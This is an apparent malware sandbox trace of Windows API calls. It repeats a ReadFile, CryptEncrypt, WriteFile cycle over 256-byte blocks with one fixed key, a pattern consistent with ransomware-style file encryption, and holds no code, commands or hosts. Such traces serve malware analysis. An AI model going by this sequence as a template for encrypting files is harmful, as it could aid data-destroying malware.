1 [0168.288] GetLastError () returned 0x0 [0168.288] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.288] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.288] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.288] GetLastError () returned 0x0 [0168.288] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.288] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.288] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.289] GetLastError () returned 0x0 [0168.289] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.289] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.289] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.289] GetLastError () returned 0x0 [0168.289] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.289] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.289] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.289] GetLastError () returned 0x0 [0168.289] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.289] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.289] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.289] GetLastError () returned 0x0 [0168.289] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.289] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.289] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.289] GetLastError () returned 0x0 [0168.289] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.289] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.289] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.289] GetLastError () returned 0x0 [0168.289] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.289] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.289] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.289] GetLastError () returned 0x0 [0168.289] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.289] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.290] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.290] GetLastError () returned 0x0 [0168.290] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.290] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.290] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.290] GetLastError () returned 0x0 [0168.290] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.290] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.290] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.290] GetLastError () returned 0x0 [0168.290] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.290] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.290] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.290] GetLastError () returned 0x0 [0168.290] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.290] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.290] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.290] GetLastError () returned 0x0 [0168.290] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.290] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.290] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.290] GetLastError () returned 0x0 [0168.290] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.290] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.290] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.291] GetLastError () returned 0x0 [0168.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.291] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.291] GetLastError () returned 0x0 [0168.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.291] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.291] GetLastError () returned 0x0 [0168.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.291] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.291] GetLastError () returned 0x0 [0168.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.291] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.291] GetLastError () returned 0x0 [0168.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.291] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.291] GetLastError () returned 0x0 [0168.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.291] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.291] GetLastError () returned 0x0 [0168.291] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.291] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.292] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.292] GetLastError () returned 0x0 [0168.292] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.292] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.292] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.292] GetLastError () returned 0x0 [0168.292] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.292] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.292] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.292] GetLastError () returned 0x0 [0168.292] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.292] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.292] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.292] GetLastError () returned 0x0 [0168.292] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.292] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.292] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.292] GetLastError () returned 0x0 [0168.292] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.292] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.292] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.292] GetLastError () returned 0x0 [0168.292] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.292] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.293] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.293] GetLastError () returned 0x0 [0168.293] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.293] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.293] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.293] GetLastError () returned 0x0 [0168.293] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.293] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.293] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.293] GetLastError () returned 0x0 [0168.293] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.293] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.293] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.293] GetLastError () returned 0x0 [0168.293] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.293] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.293] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.293] GetLastError () returned 0x0 [0168.293] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 